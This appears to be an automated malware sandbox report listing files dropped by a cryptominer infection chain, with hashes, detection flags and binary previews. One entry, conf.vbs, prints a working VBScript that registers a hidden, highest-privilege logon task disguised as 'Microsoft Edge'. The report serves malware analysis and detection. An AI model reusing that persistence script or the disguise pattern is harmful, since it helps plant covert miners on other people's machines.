                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pg1w0tfz.adz.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnasfq31.j1w.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_regrbua4.eyv.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rojvywag.cf5.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sogqcheu.p1k.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqrvq2m1.2c2.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkkejrq4.la2.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw5xsb3k.02t.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vokszajx.bpx.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wennl4vp.ldk.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfnmin1d.o05.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsmpyfit.gke.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvbc1o0h.dar.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xizpgnqk.kfe.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5qqkr2y.gq5.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhyndefk.d02.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\conf.vbs

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\curl.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):283
                                                                                                                                                                Entropy (8bit):4.915573758797463
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:ZDlzq9NqBVhusd3MEnownCfrV5ug5pVFBzL5LHi4KqGUC:LzqaBTusdnnoymV5RLFBvI4KqrC
                                                                                                                                                                MD5:218C7FCF8EAEFB826A73316798728FA6
                                                                                                                                                                SHA1:11E726ED3FAFE4DF0294EBF79762CD738F23DB0B
                                                                                                                                                                SHA-256:9BF121B6678247E3A940BAB11800060D34AB2C351A85B99BD48B9526067A3C0E
                                                                                                                                                                SHA-512:94403D19338C12CDE98154E379D6B1EE52D289E61085596D4B8E2D5047F38F7BBA7DE6DB8F05AD7693A5B7996D1BEFA285A55B6C0334DC37D6AE7C7723FC6AF7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Dim objShell.Set objShell = CreateObject("WScript.Shell")..Dim command.command = "schtasks /create /tn ""Microsoft Edge"" /tr """ & objShell.ExpandEnvironmentStrings("%temp%") & "\Microsoft-Edge.exe"" /sc onlogon /rl highest /f"..objShell.Run command, 0, True..Set objShell = Nothing

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\miner2.0.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\curl.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                Entropy (8bit):7.795901725226477
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iv4/1Nbe9kQpebDo2iXGhnYVEnAnp4E7abB24ga9P06oBCRKthHpOFF9efVw:ik1FnQkbDo/2nqO6D7abByLCWMF9iVw
                                                                                                                                                                MD5:651396CF297F15A1F92EE0A29E27C4EA
                                                                                                                                                                SHA1:695EA25EC711D8742399918D0A769151BF44D1A1
                                                                                                                                                                SHA-256:A649E59EA0F6FBA416D10DCD03900EA7BBEE9C2207F46B23E1BA270FF052BFF1
                                                                                                                                                                SHA-512:A5C59D1032032A30104F365D7F8844C8DF2CA38CA52EFD24497091CBAD719A3B3A7305F55569A1FA5D0C1F473AEF36D6847C8544365600CD646B571FC946269A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....-.f.........."...................... .....@..... ....................................@...@......@............... ............................................................................................................................... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..BH...........8............".......................................................0..G.......s......r...po.....(....r...p(....(....o....o......o......o......o......o.....(....&..&.. ....(......&..(....(....r...p(....(....o....(....r>..p(....s....rP..po....t....(....(....s......r...po..............r...p...(....(....r...p(....(....o....(.......r...p...(....o.......r...p..(....o.....(....o......o......o.....(....&..&..*..(......UU........X..d........g..C.......0..........s......s...... .

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\svchost64.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\miner2.0.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):38400
                                                                                                                                                                Entropy (8bit):7.274337601891547
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:kq5xtLVkFxo9120PojL5lVvpFnUkXJ2G95EDYq:bxtL12OojL5l76kXP95EEq
                                                                                                                                                                MD5:A8638A5105C9A663B0D6918D64B3AD21
                                                                                                                                                                SHA1:F35B98542E4E66FCE0008E7879D82BE48698380C
                                                                                                                                                                SHA-256:F795AF49314300157ABF6CBD67B115DD0CD4AD4255E148489051D847FA847E85
                                                                                                                                                                SHA-512:1883D3CF8BBE9E1B2FC754621E71A6A4D97114AF87600084BFB8BEDE44B2FD7E0C6DE14280ED284132FCE19D646031AA5836A3150530CA89FBC8513754A35D28
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: C:\Users\user\AppData\Local\Temp\svchost64.exe, Author: Joe Security
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....-.f.........."...................... .....@..... ....................................@...@......@............... ............................................................................................................................... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..BH............&...............X...................................................0..r.......(....s.... ...o....9....s......r...po................r...p(........r...p....~....(........r...p....~........r...p...(....o......o......o.....(....&.S&~....r...p(....o....~....(....~....o.....(~....r...p(....o....~....(....~....o......&..~....o....~....o....(....9....ri..p(....(.........+........o.......X.......i2.~....ri..p(....r...p(....(....(......&..~....ri..p(....r...p(....(....(......&..

                                                                                                                                                                C:\Windows\System32\Microsoft\Libs\WR64.sys

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14544
                                                                                                                                                                Entropy (8bit):6.2660301556221185
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 7%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\System32\Microsoft\Libs\sihost64.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):7680
                                                                                                                                                                Entropy (8bit):4.789460636179745
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:TzPLdR1M7kO0wCIbbjDN792+j6ZlmuKyQLW/BEb0TIoDnLz+PWwOH3aLlYR:Htwd0wCknF92+j6Zwu7i0B7ZqWTaY
                                                                                                                                                                MD5:7112FD4E6B2CDD13C11B8B04A96769CB
                                                                                                                                                                SHA1:1806D301DF0E9FFDA5CFCC76E8237D4C516D4A9E
                                                                                                                                                                SHA-256:D40E908BC1FF808DC0B6B3BB674E9DD425880C06F1DBC23C6796EACE385370BA
                                                                                                                                                                SHA-512:7ADDBFAA7DDA203E18265DA8252B18DAE3BDBD8C5DA8CDB0C427F1E50A4EB9EE39B12367BF23D524E3FE439EA426A2A3F1A68874F68B6B80B576F8788370C295
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....-.f.........."...................... .....@..... .......................`............@...@......@............... ...............................@............................................................................................... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..BH........#..$....................................................................0..&.......~....(.....(.........(......&.(......*...................0..l.........(....r...p(.....(....o.....s.......o....r3..p.s......o.....rK..p(....r...p(.....(....o....(....s....s....(........o......+;..o....t........,)..r...po....,...r...po....o.....o....,.....o....-.....,...o.....~....(....,..-y~....(....,.~.....1Y......~....~.....(....(....s........~....o ......o!.....~....("...o#......o$.....(%...

                                                                                                                                                                C:\Windows\System32\services64.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                Entropy (8bit):7.795901725226477
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iv4/1Nbe9kQpebDo2iXGhnYVEnAnp4E7abB24ga9P06oBCRKthHpOFF9efVw:ik1FnQkbDo/2nqO6D7abByLCWMF9iVw
                                                                                                                                                                MD5:651396CF297F15A1F92EE0A29E27C4EA
                                                                                                                                                                SHA1:695EA25EC711D8742399918D0A769151BF44D1A1
                                                                                                                                                                SHA-256:A649E59EA0F6FBA416D10DCD03900EA7BBEE9C2207F46B23E1BA270FF052BFF1
                                                                                                                                                                SHA-512:A5C59D1032032A30104F365D7F8844C8DF2CA38CA52EFD24497091CBAD719A3B3A7305F55569A1FA5D0C1F473AEF36D6847C8544365600CD646B571FC946269A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....-.f.........."...................... .....@..... ....................................@...@......@............... ............................................................................................................................... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..BH...........8............".......................................................0..G.......s......r...po.....(....r...p(....(....o....o......o......o......o......o.....(....&..&.. ....(......&..(....(....r...p(....(....o....(....r>..p(....s....rP..po....t....(....(....s......r...po..............r...p...(....(....r...p(....(....o....(.......r...p...(....o.......r...p..(....o.....(....o......o......o.....(....&..&..*..(......UU........X..d........g..C.......0..........s......s...... .

                                                                                                                                                                C:\Windows\Tasks\axplong.job

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):286
                                                                                                                                                                Entropy (8bit):3.4380640507285585
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:6sCSClJllVXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lb1dt0:6sIlrrpRKQ1lOmeeDHjzvYRQVft0
                                                                                                                                                                MD5:08AA780ED052C566AEECB12B6DD445E9
                                                                                                                                                                SHA1:E47AC5690977888F9398EC42690E4DD0E62DF82B
                                                                                                                                                                SHA-256:AC23B90BCD3DEE09FE6357DD0963CE814931D9C66E188F2CC61094C5B34FA02E
                                                                                                                                                                SHA-512:658922C8A455E18937108998AD578E29D1356B2A0012084D5A2DA943F564D57C19A1656DF1B67963DD27284295F149FEE27CAF88123E95215F97D2A36E53A7C5
